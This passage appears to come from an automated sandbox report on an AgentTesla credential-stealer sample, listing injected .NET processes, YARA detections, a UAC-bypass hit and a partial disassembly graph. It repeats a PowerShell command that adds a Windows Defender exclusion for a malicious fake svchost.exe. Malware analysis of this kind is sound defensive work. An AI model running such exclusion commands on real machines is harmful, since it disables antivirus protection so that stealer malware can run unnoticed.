                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                        Imagebase:0x180000
                                                                        File size:43'008 bytes
                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:15
                                                                        Start time:09:21:01
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                                                        Imagebase:0x750000
                                                                        File size:42'064 bytes
                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2877570286.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2877570286.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2877570286.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:16
                                                                        Start time:09:21:01
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                        Imagebase:0x7ff6eef20000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:17
                                                                        Start time:09:21:02
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -pss -s 456 -p 7792 -ip 7792
                                                                        Imagebase:0x7ff68a250000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:18
                                                                        Start time:09:21:02
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7792 -s 1152
                                                                        Imagebase:0x7ff68a250000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:19
                                                                        Start time:09:21:03
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:20
                                                                        Start time:09:21:03
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:21
                                                                        Start time:09:21:03
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                                                                        Imagebase:
                                                                        File size:42'064 bytes
                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:22
                                                                        Start time:09:21:03
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                        Imagebase:0x1f0000
                                                                        File size:47'584 bytes
                                                                        MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:23
                                                                        Start time:09:21:04
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                        Imagebase:
                                                                        File size:45'984 bytes
                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:24
                                                                        Start time:09:21:04
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                        Imagebase:
                                                                        File size:108'664 bytes
                                                                        MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:25
                                                                        Start time:09:21:04
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                        Imagebase:0x400000
                                                                        File size:43'008 bytes
                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:26
                                                                        Start time:09:21:05
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                        Imagebase:0x5e0000
                                                                        File size:262'432 bytes
                                                                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.2879219152.00000000029C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.2879219152.00000000029C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001A.00000002.2879219152.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:27
                                                                        Start time:09:21:05
                                                                        Start date:08/05/2024
                                                                        Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                        Imagebase:0x28ef0120000
                                                                        File size:690'092 bytes
                                                                        MD5 hash:E184C8B191B12744E919B3B95CE39A0E
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.1950991965.0000028E8033C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:28
                                                                        Start time:09:21:06
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                                        Imagebase:0x30000
                                                                        File size:262'432 bytes
                                                                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:29
                                                                        Start time:09:21:06
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:30
                                                                        Start time:09:21:06
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -pss -s 508 -p 7872 -ip 7872
                                                                        Imagebase:0x7ff68a250000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:31
                                                                        Start time:09:21:07
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7872 -s 1104
                                                                        Imagebase:0x7ff68a250000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:34
                                                                        Start time:09:21:12
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:35
                                                                        Start time:09:21:12
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:36
                                                                        Start time:09:21:12
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                        Imagebase:
                                                                        File size:45'984 bytes
                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:37
                                                                        Start time:09:21:12
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                        Imagebase:0x800000
                                                                        File size:43'008 bytes
                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.2880930308.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000002.2880930308.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000025.00000002.2880930308.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:38
                                                                        Start time:09:21:13
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                        Imagebase:0xe20000
                                                                        File size:43'008 bytes
                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:39
                                                                        Start time:09:21:13
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -pss -s 536 -p 7748 -ip 7748
                                                                        Imagebase:0x7ff68a250000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:40
                                                                        Start time:09:21:13
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7748 -s 1144
                                                                        Imagebase:0x7ff68a250000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:41
                                                                        Start time:09:21:15
                                                                        Start date:08/05/2024
                                                                        Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                        Imagebase:0x24f76110000
                                                                        File size:690'092 bytes
                                                                        MD5 hash:E184C8B191B12744E919B3B95CE39A0E
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:42
                                                                        Start time:09:21:15
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:46
                                                                        Start time:09:21:20
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:47
                                                                        Start time:09:21:20
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:48
                                                                        Start time:09:21:20
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                        Imagebase:0x9e0000
                                                                        File size:47'584 bytes
                                                                        MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000030.00000002.2877901296.0000000002D2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.2877901296.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000030.00000002.2877901296.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:49
                                                                        Start time:09:21:20
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                        Imagebase:0x230000
                                                                        File size:47'584 bytes
                                                                        MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:50
                                                                        Start time:09:21:20
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -pss -s 568 -p 8396 -ip 8396
                                                                        Imagebase:0x7ff68a250000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:51
                                                                        Start time:09:21:21
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 8396 -s 1352
                                                                        Imagebase:0x7ff68a250000
                                                                        File size:570'736 bytes
                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:52
                                                                        Start time:09:21:24
                                                                        Start date:08/05/2024
                                                                        Path:C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe"
                                                                        Imagebase:0x8b0000
                                                                        File size:43'008 bytes
                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 0%, ReversingLabs
                                                                        • Detection: 0%, Virustotal, Browse
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:53
                                                                        Start time:09:21:24
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:55
                                                                        Start time:09:21:37
                                                                        Start date:08/05/2024
                                                                        Path:C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe"
                                                                        Imagebase:0x980000
                                                                        File size:43'008 bytes
                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:56
                                                                        Start time:09:21:37
                                                                        Start date:08/05/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:9%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:13
                                                                          Total number of Limit Nodes:0
                                                                          execution_graph 13447 7ffd9b8b47a6 13448 7ffd9b8b47d1 VirtualProtect 13447->13448 13450 7ffd9b8b4908 13448->13450 13451 7ffd9b8b433a 13452 7ffd9b8b4349 13451->13452 13457 7ffd9b8b3740 13452->13457 13454 7ffd9b8b3740 VirtualProtect 13456 7ffd9b8b44b0 13454->13456 13458 7ffd9b8b3749 VirtualProtect 13457->13458 13460 7ffd9b8b4425 13458->13460 13460->13454 13461 7ffd9b8b04ba 13462 7ffd9b8b0a30 FreeConsole 13461->13462 13464 7ffd9b8b0ae1 13462->13464

                                                                          Executed Functions

                                                                          Function 00007FFD9B8C0658 Relevance: 3.6, Strings: 2, Instructions: 1115COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 284 7ffd9b8c0658-7ffd9b8c0693 287 7ffd9b8c0699-7ffd9b8c06ee call 7ffd9b8bc5f0 * 2 call 7ffd9b8b88f0 284->287 288 7ffd9b8c074e-7ffd9b8c0759 284->288 287->288 305 7ffd9b8c06f0-7ffd9b8c0714 287->305 292 7ffd9b8c075b-7ffd9b8c075d 288->292 293 7ffd9b8c075e-7ffd9b8c077a 288->293 292->293 298 7ffd9b8c077c-7ffd9b8c07a7 293->298 299 7ffd9b8c07c4-7ffd9b8c0806 call 7ffd9b8bc5f0 * 2 call 7ffd9b8b88f0 293->299 301 7ffd9b8c093b-7ffd9b8c096a 298->301 302 7ffd9b8c07ad-7ffd9b8c07c3 298->302 299->301 321 7ffd9b8c080c-7ffd9b8c082a 299->321 314 7ffd9b8c096c-7ffd9b8c0997 301->314 315 7ffd9b8c09b4-7ffd9b8c09f3 call 7ffd9b8bc5f0 * 2 call 7ffd9b8b88f0 301->315 302->299 307 7ffd9b8c0716-7ffd9b8c0726 305->307 308 7ffd9b8c0742-7ffd9b8c074d 305->308 307->288 311 7ffd9b8c0728-7ffd9b8c073f 307->311 311->308 318 7ffd9b8c0af7-7ffd9b8c0b29 314->318 319 7ffd9b8c099d-7ffd9b8c09b3 314->319 315->318 343 7ffd9b8c09f9-7ffd9b8c0a14 315->343 338 7ffd9b8c0b2b-7ffd9b8c0b56 318->338 339 7ffd9b8c0b73-7ffd9b8c0b9c call 7ffd9b8bc5f0 318->339 319->315 321->301 323 7ffd9b8c0830-7ffd9b8c084a 321->323 326 7ffd9b8c084c-7ffd9b8c084f 323->326 327 7ffd9b8c08a3-7ffd9b8c08a7 323->327 330 7ffd9b8c08d0-7ffd9b8c090f call 7ffd9b8bcfc0 326->330 331 7ffd9b8c0851-7ffd9b8c086a 326->331 333 7ffd9b8c0928-7ffd9b8c093a 327->333 334 7ffd9b8c08a9-7ffd9b8c08cf call 7ffd9b8b8c90 327->334 352 7ffd9b8c0911 330->352 336 7ffd9b8c086c-7ffd9b8c0881 331->336 337 7ffd9b8c0883-7ffd9b8c0894 331->337 334->330 344 7ffd9b8c0898-7ffd9b8c08a0 336->344 337->344 345 7ffd9b8c0c25-7ffd9b8c0c37 338->345 346 7ffd9b8c0b5c-7ffd9b8c0b6f 338->346 362 7ffd9b8c0b9e-7ffd9b8c0bdd 339->362 363 7ffd9b8c0c01-7ffd9b8c0c24 339->363 349 7ffd9b8c0a16-7ffd9b8c0a19 343->349 350 7ffd9b8c0a6d-7ffd9b8c0a74 343->350 351 7ffd9b8c08a2 344->351 344->352 364 7ffd9b8c0c79-7ffd9b8c0c87 345->364 365 7ffd9b8c0c39-7ffd9b8c0c49 345->365 346->339 357 7ffd9b8c0a1b-7ffd9b8c0a39 349->357 358 7ffd9b8c0a9a-7ffd9b8c0aa9 349->358 350->318 359 7ffd9b8c0a7a-7ffd9b8c0a97 350->359 351->327 352->301 356 7ffd9b8c0913-7ffd9b8c0926 352->356 356->333 361 7ffd9b8c0aaa-7ffd9b8c0abe call 7ffd9b8bcfc0 357->361 366 7ffd9b8c0a3b-7ffd9b8c0a40 357->366 358->361 359->358 374 7ffd9b8c0ac1-7ffd9b8c0acd 361->374 369 7ffd9b8c0c4e-7ffd9b8c0c5a 362->369 390 7ffd9b8c0bdf-7ffd9b8c0be4 362->390 363->345 370 7ffd9b8c0c8d-7ffd9b8c0ca1 364->370 371 7ffd9b8c0de3-7ffd9b8c0df9 364->371 365->369 373 7ffd9b8c0a42-7ffd9b8c0a66 call 7ffd9b8b8c90 366->373 366->374 377 7ffd9b8c0c5c-7ffd9b8c0c63 369->377 378 7ffd9b8c0ca4-7ffd9b8c0cdf call 7ffd9b8bc5f0 * 2 call 7ffd9b8be750 369->378 370->378 388 7ffd9b8c0dfb-7ffd9b8c0e0f 371->388 389 7ffd9b8c0dfa 371->389 373->350 374->318 379 7ffd9b8c0acf-7ffd9b8c0af6 374->379 381 7ffd9b8c0c65-7ffd9b8c0c76 377->381 404 7ffd9b8c0cf9-7ffd9b8c0d04 378->404 405 7ffd9b8c0ce1-7ffd9b8c0cf7 378->405 381->364 399 